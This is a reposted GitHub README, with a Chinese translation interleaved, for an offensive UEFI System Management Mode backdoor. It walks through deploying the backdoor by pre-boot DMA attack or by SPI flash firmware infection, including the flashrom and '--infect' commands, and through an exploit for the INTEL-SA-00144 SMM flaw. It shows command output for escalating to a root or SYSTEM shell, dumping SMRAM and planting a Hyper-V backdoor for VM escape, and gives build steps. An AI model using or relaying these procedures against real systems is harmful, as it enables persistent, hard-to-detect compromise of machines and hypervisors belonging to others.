SMM Backdoor Next Gen

IoT 2个月前 admin
98 0 0

SMM Backdoor Next Gen
SMM 后门下一代

General information 基本信息
Backdoor usage 后门使用
Deploying the backdoor using firmware flash image infection

Using together with Hyper-V Backdoor
与 Hyper-V 后门一起使用

Building from the source code

General information 基本信息

This version of System Management Mode backdoor for UEFI based platforms was heavily inspired by my previous project (check its GitHub repository) but introducing few key changes in order to make it more up to date:
这个版本的基于 UEFI 的平台的系统管理模式后门程序在很大程度上受到我以前的项目的启发(检查其 GitHub 存储库),但为了使其更新,引入了一些关键更改:

  • In addition to the usual firmware flash image infection method as described in the article, new SMM backdoor also can be deployed with pre-boot DMA attack using PCI Express DIY hacking toolkit (see program usage for more details) and industry-wide EFI SMM Core vulnerability exploitation to perform DXE to SMM execution transition. The vulnerability INTEL-SA-00144 was discovered by myself and reported to Intel PSIRT years ago, but it still remains not patched on many products that using old EDK2 derived firmware code, including whole AMI Aptio family. Latest generations of Intel machines are likely not vulnerable to this attack.
    除了本文中描述的常用固件闪存映像感染方法外,还可以使用 PCI Express DIY 黑客工具包部署新的 SMM 后门程序预启动 DMA 攻击(有关详细信息,请参阅程序uefi_backdoor_simple.py用法)和行业范围的 EFI SMM Core 漏洞利用,以执行 DXE 到 SMM 执行转换。漏洞 INTEL-SA-00144 是我自己发现的,并在几年前报告给英特尔 PSIRT,但在许多使用旧 EDK2 派生固件代码的产品(包括整个 AMI Aptio 系列)上仍未修补。最新一代的英特尔机器可能不容易受到这种攻击。

  • Client program supports Windows and Linux systems and can interact with SMM backdoor using SW SMI (requires high privileges and chipsec installed) or APIC periodic timer method that can work with any privileges level.
    客户端程序 支持Windows和Linux系统,并且可以使用SW SMI(需要高权限和芯片安装)或可以使用任何权限级别的APIC定期计时器方法与SMM后门进行交互。

  • There's and test client programs for SMM backdoor that demonstrating local privileges escalation under Windows and Linux by using its API provided by library. SMM后门有测试客户端程序,通过使用库提供的 API演示Windows和Linux下的本地权限提升。

  • SMM backdoor is fully virtualization-aware now, its library and client programs can work as expected inside Windows or Linux virtual machines running on the infected host system.

  • SMM backdoor also can be used to load my Hyper-V backdoor (which is also part of PCI Express DIY hacking toolkit) into the currently running hypervisor during RT phase and perform guest to host VM escape attacks. Test client program is used for integration with Hyper-V backdoor and its deployment.
    SMM 后门还可用于在 RT 阶段将我的 Hyper-V 后门(也是 PCI Express DIY 黑客工具包的一部分)加载到当前正在运行的虚拟机管理程序中,并执行来宾到主机 VM 逃逸攻击。测试客户端程序用于与Hyper-V后门程序 及其部署集成。

Backdoor usage 后门使用

Project documentation is incomplete at this moment, but here's some command line examples.

Deploying SMM backdoor UEFI driver with PCI Express DIY hacking toolkit using pre-boot DMA attack, DXE to SMM execution transition exploit mentioned above will be started automatically once backdoor driver will be loaded:
使用预启动 DMA 攻击部署带有 PCI Express DIY 黑客工具包的 SMM 后门 UEFI 驱动程序,一旦加载后门驱动程序,将自动启动上述 DXE 到 SMM 执行转换漏洞:

# python2 --driver SmmBackdoorNg_X64.efi
[+] Using UEFI system table hook injection method
[+] Reading DXE phase payload from SmmBackdoorNg_X64.efi
[+] Waiting for PCI-E link...
[!] PCI-E endpoint is not configured by root complex yet
[!] PCI-E endpoint is not configured by root complex yet
[!] Bad MRd TLP completion received
[+] PCI-E link with target is up
[+] Device address is 01:00.0
[+] Looking for DXE driver PE image...
[+] PE image is at 0x7a070000
[+] EFI_SYSTEM_TABLE is at 0x7a03e018
[+] EFI_BOOT_SERVICES is at 0x7a38fa30
[+] EFI_BOOT_SERVICES.LocateProtocol() address is 0x7a3987b4
Backdoor image size is 0x49a0
Backdoor entry RVA is 0x20fc
Planting DXE stage driver at 0xc0000...
Hooking LocateProtocol(): 0x7a3987b4 -> 0x000c20fc
1.852231 sec.
[+] DXE driver was planted, waiting for backdoor init...
[+] DXE driver was executed
[+] DONE

In case if you're going to deploy SMM backdoor with PCI Express DIY hacking toolkit − I would recommend to get used Xilinx ZC706 from e-Bay rather than older SP605 evaluation kit, since this board has better design, can perform DMA attacks faster and its development tools are more suitable for modern day use.
如果您打算使用 PCI Express DIY 黑客工具包部署 SMM 后门 - 我建议您使用 e-Bay 的 Xilinx ZC706 而不是较旧的 SP605 评估套件,因为该板具有更好的设计,可以更快地执行 DMA 攻击,其开发工具更适合现代使用。

To deploy SMM backdoor you also can use my Pico DMA project − fully autonomous pre-boot DMA attack hardware implant for M.2 slot based on PicoEVB development board that can run arbitrary UEFI DXE drivers as payload.
要部署 SMM 后门,您还可以使用我的 Pico DMA 项目 - 基于 PicoEVB 开发板的 M.2 插槽的完全自主预启动 DMA 攻击硬件植入,可以将任意 UEFI DXE 驱动程序作为有效负载运行。

In addition, you also can deploy the backdoor using firmware flash image infection described below in the next section.

Basic use of SMM backdoor client program to display backdoor debug messages buffer once it was loaded and system has been booted:
SMM后门客户端程序的基本使用,在加载后门调试消息缓冲区并引导系统后显示后门 调试消息缓冲区:

# python2 --debug
****** Chipsec Linux Kernel module is licensed under GPL 2.0
[+] Obtaining backdoor debug information...
[+] Debug output buffer physical address is 0x79da4000

00000001 - backdoor.c(1573) : ******************************
00000002 - backdoor.c(1574) :
00000003 - backdoor.c(1575) :   SMM backdoor loaded
00000004 - backdoor.c(1576) :
00000005 - backdoor.c(1577) : ******************************
00000006 - backdoor.c(1589) : Resident code base address is 0x79d9f000
00000007 - backdoor.c(1502) : BackdoorResidentDma()
00000008 - backdoor.c(313) : Protocol notify handler is at 0x79d9f364
00000009 - backdoor.c(1423) : SMM access 2 protocol is at 0x778fe650
00000010 - backdoor.c(1424) : Available SMRAM regions:
00000011 - backdoor.c(1434) :  * 0x7b000000:0x7b000fff
00000012 - backdoor.c(1434) :  * 0x7b001000:0x7b7fffff
00000013 - exploit.c(242) : SMM communicate header is at 0x79da2ae0
00000014 - exploit.c(256) : Executing SMM callback...
00000015 - backdoor.c(1215) : Running in SMM
00000016 - backdoor.c(1216) : SMM system table is at 0x7b7f84c0
00000017 - backdoor.c(1177) : Max. SW SMI value is 0xff
00000018 - backdoor.c(1188) : SW SMI handler is at 0x7b5effb8
00000019 - exploit.c(271) : Communicate(): status = 0xe, size = 0x19
00000020 - exploit.c(277) : Exploit(): Exploitation success
00000021 - backdoor.c(409) : SmmCtlHandle(): Periodic timer SW SMI was enabled
00000022 - backdoor.c(1328) : new_SetVirtualAddressMap()
00000023 - backdoor.c(1369) : New address of the resident image is 0xfffffffeec79f000

Check for responding backdoor and show basic information about System Management Mode execution environment:

# python2 --use-timer --test
[+] Checking if SMM backdoor is present...
[+] Obtaining information...

  CR0 = 0x80000033
  CR3 = 0x7b7b1000
 SMST = 0x7b7f84c0

[+] SMRAM regions:

 * 0x7b000000:7b000fff
 * 0x7b001000:7b7fffff

Example of reading of arbitrary physical memory, beginning of SMRAM region in this case:
读取任意物理内存的示例,在这种情况下为 SMRAM 区域的开头:

# python2 --use-timer --read-phys 0x7b000000 --size 0x80
7b000000: 53 4d 4d 53 33 5f 36 34 90 c5 7d 7b 00 00 00 00 | SMMS3.64........
7b000010: 00 60 7a 7b 00 00 00 00 00 80 00 00 00 00 00 00 | ..z.............
7b000020: 33 00 00 80 00 00 00 00 00 10 7b 7b 00 00 00 00 | 3...............
7b000030: 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | h...............
7b000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
7b000050: 00 00 00 00 00 00 00 00 00 00 c0 84 7f 7b 00 00 | ................
7b000060: 00 00 e1 13 e0 12 e0 12 f0 12 e1 13 f1 03 f1 03 | ................
7b000070: f1 02 e1 13 e0 12 e0 12 e0 02 e1 13 f1 03 f1 03 | ................

To read and dump entire SMRAM regions into the file you can use the following command:
要将整个 SMRAM 区域读取并转储到文件中,您可以使用以下命令:

# python2 --dump-smram
****** Chipsec Linux Kernel module is licensed under GPL 2.0
[+] Dumping SMRAM regions, this may take a while...
[+] Creating SMRAM_dump_7b000000_7b7fffff.bin

Example of client program usage for local privileges escalation under the Linux operating system:
在 Linux 操作系统下,本地权限提升的 客户端程序使用示例:

$ python2
[+] Initializing SMM backdoor client...
[+] User CR3 = 0x271b14000
[+] LSTAR = 0xffffffff81e00010
[+] do_syscall_64() is at 0xffffffff810025c0
[+] sys_call_table() is at 0xffffffff822001a0
[+] sys_getuid() is at 0xffffffff81073c10
[+] task_struct offset is 0x14d40
[+] cred offset is 0x628
[+] IA32_KERNEL_GS_BASE = 0xffff888277a00000
[+] Process task_struct is at 0xffff88827148db00
[+] Process cred is at 0xffff88827289d000
[+] Overwriting process credentials...
[+] Done, spawning root shell...

sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)

Example of client program usage for local privileges escalation under the Windows operating system: 在 Windows 操作系统下,客户端程序用于本地权限提升的示例:

PS C:\> python2
[+] Initializing SMM backdoor client...
[+] NT version is 10.0.19041
[+] _EPROCESS Token offset is 0x04b8
[+] _KPCR KernelDirectoryTableBase offset is 0x9000
[+] _KPCR structure is at 0xfffff8005f486000
[+] KVA shadow is disabled or not present
[+] Kernel CR3 value is 0x0000000141491000
[+] Token object address is 0xffffcd0ef752c060
[+] Present privileges: 0x1e73deff20 -> 0x1ff2ffffbc
[+] Enabled privileges: 0x60900000 -> 0x1ff2ffffbc
[+] Current process object address is 0xffffa60de954a080
[+] System process object address is 0xffffa60de12dd080
[+] Overwriting process token...
[+] Done, spawning SYSTEM shell...

Microsoft Windows [Version 10.0.19041.208]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\> whoami
nt authority\system

Deploying the backdoor using firmware flash image infection

To infect platform firmware stored in the flash chip on the motherboard with SMM backdoor you will need some SPI flash programmer, I prefer to use cheap and widely available FT2232H Mini Module from FTDI. Also, there's a board called Tigrad − multi-protocol, multi-voltage tool for hardware hacking that can work as SPI flash programmer. In addition to the programmer you also will need the following tools:
要使用SMM后门感染存储在主板闪存芯片中的平台固件,您将需要一些SPI闪存编程器,我更喜欢使用FTDI便宜且广泛使用的FT2232H迷你模块。此外,还有一个名为Tigrad的板 - 用于硬件黑客的多协议,多电压工具,可以用作SPI闪存编程器。除了程序员之外,您还需要以下工具:

  • UEFITool utility to parse and edit UEFI flash images
    用于解析和编辑 UEFI 闪存映像的 UEFITool 实用程序
  • Flashrom utility to work with SPI flash programmer
  • SOIC8 test clip or probe hook clips kit to connect programmer to the flash chip without its de-soldering
    SOIC8 测试夹或探头挂钩夹套件,用于将编程器连接到闪存芯片,无需脱焊

First of all, you have to disassemble the machine and locate SPI flash chip with platform firmware. Usually, it's W25Q64 or W25Q128 Windbond NOR flash in SOIC8 package. Then you have to connect the chip to the FT2232H Mini Module. It’s more convenient to use SOIC8 test clip than probe hook clips, but very often there’s not enough free space around the chip to place test clip.
首先,您必须拆卸机器并找到带有平台固件的SPI闪存芯片。通常,它是W25Q64或W25Q128采用SOIC8封装的Windbond NOR闪存。然后,您必须将芯片连接到FT2232H迷你模块。使用 SOIC8 测试夹比探头钩夹更方便,但芯片周围通常没有足够的可用空间来放置测试夹。

In case if you happen to find WSON8 packaged chip on you board instead of usual SOIC8 − you can either de-solder it or use some sort of DIY spring-loaded pogo pin test probe like this one to tap its pads:
如果您碰巧在电路板上找到WSON8封装芯片而不是通常的SOIC8 - 您可以将其拆焊或使用某种DIY弹簧加载弹簧针测试探针,例如像这样的探针来敲击其焊盘:

SMM Backdoor Next Gen

Flash chip must be connected to the channel A of FT2232 Mini Module by the following scheme:

SMM Backdoor Next Gen

Now you can read flash chip contents using Flashrom:

# flashrom -p ft2232_spi:type=2232H,port=A –r firmware.bin

After that you need to open dumped firmware in UEFITool, locate arbitrary UEFI SMM driver to infect and extract its PE32 image section from the firmware image:
之后,您需要在UEFITool中打开转储的固件,找到任意UEFI SMM驱动程序以感染并从固件映像中提取其PE32映像部分:

SMM Backdoor Next Gen

For example, I picked NvramSmm UEFI SMM driver responsible for NVRAM access as pretty much suitable one. Then you can infect extracted driver with SMM backdoor using --infect command line option of program:
例如,我选择了 NvramSmm 负责NVRAM访问的UEFI SMM驱动程序作为非常合适的驱动程序。然后,您可以使用程序的命令行选项使用 --infect SMM后门感染提取的 驱动程序:

# python2 --infect NvramSmm.bin --output NvramSmm_infected.bin --payload SmmBackdoorNg_X64.efi

After that you have to replace original driver image with NvramSmm_infected.bin one in UEFITool, save resulting firmware image and flash it back into the chip:
之后,您必须将原始驱动程序映像替换为UEFITool中的驱动程序映像,保存生成的固件映像 NvramSmm_infected.bin 并将其刷新回芯片中:

# flashrom -p ft2232_spi:type=2232H,port=A –w firmware_infected.bin

Using together with Hyper-V Backdoor
与 Hyper-V 后门一起使用

Once you have SMM backdoor loaded, as it shown above, you can use its capabilities to load Hyper-V backdoor during runtime phase with appropriate client program running inside arbitrary guest or host Hyper-V partition.
加载 SMM 后门后门后,如上所示,您可以使用其功能在运行时阶段加载 Hyper-V 后门,并在任意来宾或主机 Hyper-V 分区内运行适当的客户端程序。

To do that you need to save backdoor.bin file form Hyper-V backdoor repository as hyper_v_backdoor.bin in the same folder with test client program and then just run it:
为此,您需要将文件从Hyper-V后门存储库保存 backdoor.bin 为 hyper_v_backdoor.bin 与测试客户端程序相同的 文件夹中,然后运行它:

PS C:\> python2
[+] Initializing SMM backdoor client...
[+] Searching for VMCS structure in physical memory, this might take a while...

 Scan step: 0x0000000001000000
 Scan from: 0x0000000100000000
   Scan to: 0x0000000200000000

[+] Hypervisor VMCS structure was found

 Physical address: 0x0000000109341000
         HOST_CR3: 0x0000000100103000
         HOST_RIP: 0xfffff87b6963236a

[+] HvlpLowMemoryStub() is at 0x0000000000002000
[+] Host operating system version is 2004
[+] VM exit handler is at 0xfffff87b6960e010
[+] VM exit handler call is at 0xfffff87b69632440
[+] 14 bytes jump is at 0xfffff87b69632466
[+] Backdoor entry is at 0x0000000000002700
[+] Backdoor code size is 860 bytes
[+] Patching VM exit handler call...
[+] Done, Hyper-V backdoor was successfully installed

In case when is unable to locate target VMCS region − you can override its default scanning options by specifying appropriate values in --scan-from--scan-to and --scan-step command line arguments of the program. Since VMCS region location stage might take a while, you also can use --verbose option of the program to display operation progress information.
如果无法找到目标 VMCS 区域 − 可以通过在程序的 --scan-to 和 --scan-step 命令行参数中 --scan-from 指定适当的值来覆盖其默认扫描选项。由于VMCS区域位置阶段可能需要一段时间,因此您还可以使用 --verbose 程序的选项来显示操作进度信息。

After successful Hyper-V backdoor load you can run its client program to ensure that backdoor is up and responding:
成功加载 Hyper-V 后门程序后,您可以运行其客户端程序以确保后门程序已启动并响应:

PS C:\> .\hyper_v_backdoor_client.exe 0
[+] Running on CPU #0
[+] Hyper-V backdoor is running

      Hypervisor CR0: 0x80010031
      Hypervisor CR3: 0x100103000
      Hypervisor CR4: 0x422e0
 Hypervisor IDT base: 0xfffff87b69a00180 (limit = 0xffff)
  Hypervisor GS base: 0xfffff87b69ba6000
        VMCS address: 0x109341000
     VM exit handler: 0xfffff87b6960e010
       VM exit count: 0x86ed
       VM call count: 0x2518

For more information about Hyper-V backdoor client program and performing guest to host VM escape attacks on Windows targets you can check usage examples in Hyper-V backdoor documentation.
有关 Hyper-V 后门客户端程序和对 Windows 目标执行来宾到主机 VM 逃生攻击的详细信息,您可以查看 Hyper-V 后门文档中的使用示例。

Building from the source code

To compile SMM backdoor UEFI driver SmmBackdoorNg_X64.efi you need to have a Windows machine with Visual Studio and EDK II source code installed.
要编译SMM后门UEFI驱动程序 SmmBackdoorNg_X64.efi ,您需要安装一台安装了Visual Studio和EDK II源代码的Windows机器。

To build project from the source code you need to perform the following steps:

  1. Install Visual Studio and EDK II following its setup instructions.
    按照其设置说明安装 Visual Studio 和 EDK II。

  2. Copy SmmBackdoorNg project directory into the EDK source code directory.
    将项目目录复制到 SmmBackdoorNg EDK 源代码目录中。

  3. Edit Conf/target.txt file of EDK, set ACTIVE_PLATFORM value to OvmfPkg/OvmfPkgX64.dsc and TOOL_CHAIN_TAG in according to your installed version of Visual Studio.
    编辑 Conf/target.txt EDK的文件,根据 ACTIVE_PLATFORM 您安装的Visual Studio版本设置值 OvmfPkg/OvmfPkgX64.dsc TOOL_CHAIN_TAG 。

  4. Edit OvmfPkg/OvmfPkgX64.dsc file of EDK and add SmmBackdoorNg/SmmBackdoorNg.inf line at its end.
    编辑 OvmfPkg/OvmfPkgX64.dsc EDK的文件并在其末尾添加 SmmBackdoorNg/SmmBackdoorNg.inf 行。

  5. Open Visual Studio command prompt and change current directory to previously copied SmmBackdoorNg directory.
    打开 Visual Studio 命令提示符,并将当前目录更改为以前复制 SmmBackdoorNg 的目录。

  6. Execute build command to compile SMM backdoor UEFI driver.
    执行 build 命令编译 SMM 后门 UEFI 驱动程序。

  7. Resulting image file will be created in appropriate sub-directory of Build/OvmfX64/ EDK directory depending on used build target and Visual Studio version.
    生成的图像文件将在 EDK 目录的 Build/OvmfX64/ 相应子目录中创建,具体取决于使用的构建目标和 Visual Studio 版本。

About 大约

Developed by: 开发方:
Dmytro Oleksiuk (aka Cr4sh)
Dmytro Oleksiuk (aka Cr4sh)

[email protected]

原文始发于GitHub:SMM Backdoor Next Gen

版权声明:admin 发表于 2023年10月13日 上午8:40。
转载请注明:SMM Backdoor Next Gen | CTF导航